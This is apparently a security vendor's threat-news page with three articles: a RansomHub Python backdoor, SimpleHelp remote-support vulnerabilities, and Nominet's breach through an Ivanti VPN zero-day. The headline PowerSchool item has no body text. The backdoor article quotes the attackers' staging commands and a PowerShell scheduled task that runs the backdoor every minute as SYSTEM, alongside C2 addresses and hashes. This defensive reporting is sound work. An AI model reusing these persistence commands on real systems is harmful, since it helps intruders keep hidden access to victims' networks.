company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Extortion

loading..
loading..
loading..

PowerSchool Cyberattack Exposes Historical Data of Students and Teachers

Explore the PowerSchool data breach affecting millions of students and teachers. Learn about its impact, security lapses, and preventive measures

17-Jan-2025
5 min read

No content available.

Related Articles

loading..

Ransomhub

Backdoor

Python-based backdoor used by RansomHub ransomware, exploiting network flaws wit...

In an alarming incident reported in Q4 2024, reveals evidence of a sophisticated threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints. This breach was exploited to deploy RansomHub encryptors across the impacted network. Earlier, in February 2024, [ReliaQuest documented a prior version of this malware](https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/), highlighting the continuous evolution of this malicious tool. ### Key Features of the Latest Python Backdoor GuidePoint’s investigation revealed critical updates in the latest variant of the Python-based backdoor, setting it apart from its predecessors. Key distinctions include: - **Obfuscation Techniques**: Utilized [PyObfuscate[.]com](https://blog.sucuri.net/2024/06/socgholish-malware.html) for code obfuscation to evade detection. - **Deployment Method**: Exploited Remote Desktop Protocol (RDP) for lateral movement. - **Unique Indicators of Compromise (IoC)**: Introduced distinct filenames, scheduled task names, and command-and-control (C2) addresses. Collaboration with cybersecurity experts, including @drb_ra, resulted in the publication of 18 C2 IP addresses on GitHub under the repository “[drb-ra/C2IntelFeeds](https://github.com/drb-ra/C2IntelFeeds).” ### The Deployment Process The malware deployment followed a systematic and precise methodology: 1. **Initial Access**: [SocGholish (FakeUpdate)](https://mediatrust.com/blog/socgholish-driveby-download-compromised-landing-page/) was identified as the initial access vector. 2. **Python Backdoor Deployment**: Dropped on the initial compromised system 20 minutes post-infection. 3. **Lateral Movement**: Additional systems were infected via RDP. The five-step process for installing Python and deploying the backdoor included: 1. Navigating to the target directory: `C:\users\<redacted>\appdata\local\connecteddevicesplatform` 2. Installing Python: ``` wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip ``` 3. Setting up PIP and required libraries: ``` wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz; .\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location; ``` 4. Creating a Python proxy script: `get-pip2.pyd` 5. Establishing persistence with scheduled tasks: ``` powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd'; $t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system' ``` ### Technical Analysis of the Python Script #### Functionality The backdoor functions as a reverse proxy, creating a SOCKS5-like tunnel to enable lateral movement. Key operations include: 1. Establishing an initial TCP connection to a hardcoded IP address. 2. Utilizing the received data to create a secondary connection. 3. Acting as a proxy for threat actor communication. #### Obfuscation and AI-Generated Code The script employs advanced obfuscation techniques and demonstrates exceptional coding standards. Observations include: - **Polished Code**: Suggestive of meticulous programming or AI-assisted code generation. - **Structured Design**: Utilized classes, descriptive method names, and robust error handling. - **Dynamic Variables**: Hardcoded IPs and ports ensure seamless operation. #### C2 Behavior The backdoor’s C2 communications involve: 1. TCP socket creation and idle state awaiting specific bytes. 2. Secondary TCP connection based on received data. 3. SOCKS5-like tunnel establishment for proxied traffic. ### Evidence of Advanced Persistence The malware’s persistence strategy involves: - Regular execution via scheduled tasks. - Frequent updates to evade detection. - Leveraging obfuscated versions for minimal VirusTotal detection. Notably, [VirusTotal’s report on the malware](https://www.virustotal.com/gui/file/64d8f12cdcd1dfa7a3c012a36c011a43303dc8357b7899db254a022b187cba03) highlighted zero detections at the time of upload. ### Indicators of Compromise (IoC) Key IoCs include: - **Filename**: `get-pip2.pyd` - **Task Name**: `get-pip2` - **SHA256 Hash**: `5089fd6ce6d8c0fca8d9c4af7441ee9198088bfba6e200e27fe30d3bc0c6401c` - **C2 IPs**: Examples include `185.174.101.240`, `38.180.81.153`, and `104.238.61.144` (full list available on GitHub). ### Key Takeaways - RansomHub affiliates are leveraging Python-based backdoors for persistence and evasion. - The adoption of AI in malware development is an emerging trend. - Continuous monitoring and collaboration are essential to counter these threats. [Halcyon’s detailed threat insights](https://www.halcyon.ai/blog/halcyon-threat-insights-012-january-2025-ransomware-report) provide further context on this evolution.

loading..   16-Jan-2025
loading..   4 min read
loading..

Simplehelp

RCE

Critical SimpleHelp flaws expose systems to attacks. Learn how these vulnerabili...

The digital landscape was rocked in 2024 by a wave of zero-day vulnerabilities that exploited popular remote access software like [ConnectWise ScreenConnect (CVE-2024-1708)](https://nvd.nist.gov/vuln/detail/CVE-2024-1708) and [BeyondTrust products (CVE-2024-12356)](https://nvd.nist.gov/vuln/detail/CVE-2024-12356). As we entered 2025, the discovery of critical flaws in **SimpleHelp Remote Support Software** has sent shockwaves through the cybersecurity world, highlighting the pervasive risks in tools that many organizations rely on for remote assistance. ## **SimpleHelp: The Silent Player with a Significant Impact** SimpleHelp, a relatively lesser-known name in the remote support software arena, is more widespread than many might assume. A quick dive into its usage statistics reveals that the platform is being utilized by thousands of users globally, with the United States leading the pack, followed by the United Kingdom, France, Canada, and Australia. While its market share might not rival giants like TeamViewer or AnyDesk, SimpleHelp’s vulnerabilities pose a grave threat, as they potentially allow malicious actors to compromise not only the software itself but also the client machines it connects to. This alarming discovery underscores the urgent need for organizations to scrutinize the software they trust with sensitive operations. ## **Three Critical Vulnerabilities** After conducting a thorough security audit, researchers unearthed three severe vulnerabilities in SimpleHelp, each with the potential to wreak havoc on businesses relying on its services. Let’s break down these flaws: ### 1. **Unauthenticated Path Traversal Vulnerability (CVE-2024-57727)** This is the most critical of the trio. Exploiting this vulnerability, attackers can download arbitrary files from a SimpleHelp server without authentication. Since SimpleHelp stores all its data on disk as files, this creates an immediate threat: - Access to **serverconfig.xml**, a key configuration file, could provide hashed passwords for admin accounts and technicians. - Exposure of sensitive credentials like **LDAP secrets**, **OIDC client details**, and **API keys** could facilitate further attacks. The situation is worsened by the use of a hardcoded encryption key, rendering any encrypted logs or configuration files susceptible to decryption. For more technical details, see the [Horizon3.ai disclosure](https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/). ### 2. **Arbitrary File Upload Leading to Remote Code Execution (CVE-2024-57728)** With admin-level access, an attacker can exploit this vulnerability to upload arbitrary files directly onto the SimpleHelp server. This opens the door to remote code execution: - On Linux systems, attackers can upload malicious **crontab files** to execute remote commands. - On Windows, attackers can overwrite key executables or libraries, gaining control of the host machine. An example exploit demonstrated the use of a reverse shell on a compromised Linux server, showcasing the devastating potential of this flaw. ### 3. **Privilege Escalation From Technician to Admin (CVE-2024-57726)** Even low-level technician accounts are not immune. This vulnerability allows attackers to escalate their privileges to those of an administrator by exploiting unprotected backend authorization checks. Once elevated, attackers can: - Gain control of the entire SimpleHelp server. - Exploit the file upload vulnerability to execute commands remotely, extending their reach to other connected machines. ## **How to Detect Vulnerable Systems** SimpleHelp servers can be checked for vulnerabilities by accessing the `/allversions` endpoint or inspecting the HTTP Server header. Any version predating **5.5.8**, **5.4.10**, or **5.3.9** is at risk. A complete list of exploited vulnerabilities is available in [CISA’s Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog). ## **Solution: Patch Immediately** SimpleHelp has responded quickly, releasing patches to address these vulnerabilities. The latest versions (**5.5.8**, **5.4.10**, and **5.3.9**) contain the necessary fixes, and all users are strongly urged to update immediately. For more details, refer to the [SimpleHelp KnowledgeBase article](https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier). ## **Timeline of Events** - **Dec. 30, 2024**: Researchers contact SimpleHelp to report vulnerabilities. - **Jan. 6, 2025**: SimpleHelp acknowledges the report and begins remediation. - **Jan. 7, 2025**: Researchers notify affected customers. - **Jan. 8, 2025**: Patch versions **5.5.8** and **5.4.10** are released. - **Jan. 13, 2025**: Patch version **5.3.9** is released. - **Jan. 14, 2025**: CVEs are officially assigned. ## **Trust and Remote Support Tools** The SimpleHelp vulnerabilities highlight a broader issue in the cybersecurity ecosystem. Tools designed to facilitate remote support and management are inherently attractive targets for attackers due to their access privileges and widespread use. Organizations must adopt a proactive approach: - Conduct regular security audits of third-party software. - Implement strict privilege management and monitoring. - Stay informed about known vulnerabilities and apply patches promptly. ## **Final Thoughts** The recent vulnerabilities demonstrate how attackers exploit overlooked weaknesses to devastating effect. Addressing these challenges requires organizations to rethink their cybersecurity strategy: proactive threat modeling, continuous monitoring of software dependencies, and leveraging zero-trust principles to reduce attack surfaces. Effective responses must be as agile as the threats they face, turning every exploit into an opportunity to strengthen their security posture. For users of SimpleHelp, the message is clear: **Upgrade now or risk falling victim to these critical flaws.** For further updates, visit the [official SimpleHelp website](https://simple-help.com/).

loading..   15-Jan-2025
loading..   5 min read
loading..

VPN

Ivanti

Zero Day

Explore Nominet's VPN breach, the Ivanti zero-day vulnerability, and cybersecuri...

In recent weeks, Nominet, the official .UK domain registry and one of the largest country code registries globally, confirmed a significant cybersecurity incident. The breach, reported to have occurred via a zero-day vulnerability in Ivanti Connect Secure, affected Nominet’s systems, prompting widespread scrutiny of the vulnerabilities in remote access software. The breach is a stark reminder of the continuous threats faced by organizations managing critical infrastructure, especially those handling domain name services and cyber defense systems. This Threatfeed dives into the incident’s details, explaining the Ivanti VPN zero-day vulnerability, the malware used in the attack, and the steps organizations should take to protect themselves from similar risks. ### **Understanding the Ivanti VPN Zero-Day Vulnerability** On January 13, 2025, Nominet reported a breach within its systems due to a critical vulnerability in Ivanti Connect Secure. This vulnerability, tracked as CVE-2025-0282, allowed attackers to exploit a weakness in the VPN software’s remote access functionality. VPNs (Virtual Private Networks) are widely used in organizations for secure remote access to internal networks. They create an encrypted connection, ensuring confidentiality and integrity during data transmission. However, vulnerabilities in VPN systems can be exploited to gain unauthorized access to sensitive systems and data, as demonstrated by this incident. Ivanti, the vendor behind Ivanti Connect Secure, had been tracking this vulnerability since mid-December 2024. The company reported that the vulnerability was actively being exploited by hackers, particularly targeting its VPN appliances. These exploits utilized a custom malware toolkit, Spawn, which is believed to be associated with a China-linked espionage group, UNC5337. This highlights a growing trend of state-sponsored cyber espionage groups using sophisticated malware to infiltrate high-value targets like Nominet, which handles over 11 million .uk domains, including government entities like .gov.uk. ### **Key Elements of the Attack** The breach occurred when attackers exploited the Ivanti VPN vulnerability to infiltrate Nominet's network. It is essential to note that the attackers employed two specific types of malware during the breach: *Spawn* and *Dryhook* (and *Phasejam*). Spawn is a toolkit commonly linked to advanced persistent threat (APT) groups, while Dryhook and Phasejam are newer forms of malware that could potentially evolve into tools used for widespread espionage campaigns. These malware types allow attackers to maintain persistent access and deploy additional malicious payloads within compromised networks. In addition to these custom malware tools, cybersecurity experts, including Mandiant, reported that over 3,600 Industrial Control Systems (ICS) appliances were exposed to the internet after Ivanti’s release of a patch for the zero-day vulnerability. This revelation underscores the severe security risks associated with unsecured VPNs in critical sectors such as energy, government, and industrial systems. ### **Nominet’s Response and the Role of PDNS** Following the detection of suspicious activity within its network, Nominet took immediate steps to mitigate the impact of the breach. The organization reported the attack to relevant authorities, including the National Cyber Security Centre (NCSC), and restricted VPN access to its systems. Furthermore, Nominet initiated an ongoing investigation to assess the full scope of the breach. Although the company has not found any evidence of backdoors or data leakage, the event highlights the critical importance of adopting stringent cybersecurity measures. The fact that the attack originated through third-party software (Ivanti Connect Secure) emphasizes the potential vulnerabilities introduced by reliance on external vendors for essential security infrastructure. It is also worth noting that Nominet no longer operates the UK’s Protective Domain Name Service (PDNS) as of September 2024. PDNS was a vital service protecting over 1,200 organizations and more than 7 million end users from cyber threats. Nominet’s ability to protect UK organizations through this service, while facing ongoing scrutiny due to this breach, puts a spotlight on the importance of having resilient, secure systems in place, especially in the realm of domain name services. ### **Impact on the Domain Registration Ecosystem** Nominet’s role as the registry operator for the .uk domain namespace is crucial to the functioning of the internet infrastructure in the UK. As one of the largest country code registries, Nominet manages millions of domain names, including highly sensitive government and organizational domains. A breach involving Nominet could have far-reaching consequences for the integrity of the UK's domain registration system. Thankfully, Nominet has assured its customers that domain registration and management systems continue to operate normally. Despite the breach, Nominet has indicated that no data breach or leakage has occurred. The company’s registry systems are reportedly protected by robust firewalls and restricted access protocols, which could have helped limit the potential fallout from this attack. However, the security incident serves as a stark reminder of the vulnerabilities in even the most trusted infrastructure. ### **What Can Organizations Learn from This Incident?** The Nominet breach serves as a critical learning point for organizations, especially those operating in domains related to cybersecurity, critical infrastructure, and government services. Here are several key takeaways: 1. **The Importance of Regular Software Updates**: The Ivanti VPN zero-day vulnerability was a critical issue that could have been mitigated if the affected systems had applied the necessary security patches. Organizations should regularly update their software and apply security patches as soon as they become available. 2. **Multi-layered Security Protocols**: While Ivanti’s patch mitigated the vulnerability in Connect Secure, relying on a single security measure such as a VPN is insufficient. Nominet’s quick response in restricting VPN access and reporting the breach to authorities highlights the importance of adopting multi-layered security protocols. These should include firewalls, intrusion detection systems, and endpoint protection. 3. **Enhanced Vendor Risk Management**: The attack underscores the importance of thorough vendor risk assessments, especially when relying on third-party software for critical systems. Organizations must ensure that their third-party vendors follow rigorous security practices, and ideally, perform independent security audits of their software. 4. **Threat Intelligence and Incident Response**: The rapid response by Nominet, including collaboration with the NCSC, is a best practice for organizations. It’s vital to have a well-defined incident response plan in place that includes identifying and reporting breaches, as well as collaborating with external agencies to mitigate risks. 5. **Training and Awareness**: Finally, regular cybersecurity training for employees is crucial. Remote access software such as VPNs often requires special attention when securing users’ access credentials. Training personnel to recognize suspicious activity and follow secure practices is an essential part of cybersecurity defense. ### **Continuing Evolution of Cyber Threats** The Nominet breach is just one example of the ever-evolving landscape of cyber threats. Attackers continue to refine their methods, using sophisticated malware, exploiting zero-day vulnerabilities, and targeting critical infrastructure. While Nominet’s response has been proactive, the incident serves as a wake-up call for organizations worldwide to invest in robust cybersecurity measures and adopt a zero-trust approach to network security. ### **Key Takeaways** - **Zero-Day Vulnerabilities**: A critical issue in cybersecurity that requires rapid patching and continuous monitoring. - **Advanced Malware**: The use of custom malware kits such as Spawn, Dryhook, and Phasejam can evade detection and create persistent threats. - **Response and Recovery**: Nominet’s fast response and collaboration with authorities provide a model for other organizations facing similar breaches. - **Vendor Management**: The reliance on third-party vendors for critical security infrastructure presents inherent risks, necessitating stronger vendor risk management practices.

loading..   15-Jan-2025
loading..   7 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

This website uses cookies to ensure you get the best experience on our website. By continuing on our website, you consent to our use of cookies. To find out more about how we use cookies, please see our Cookies Policy.

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958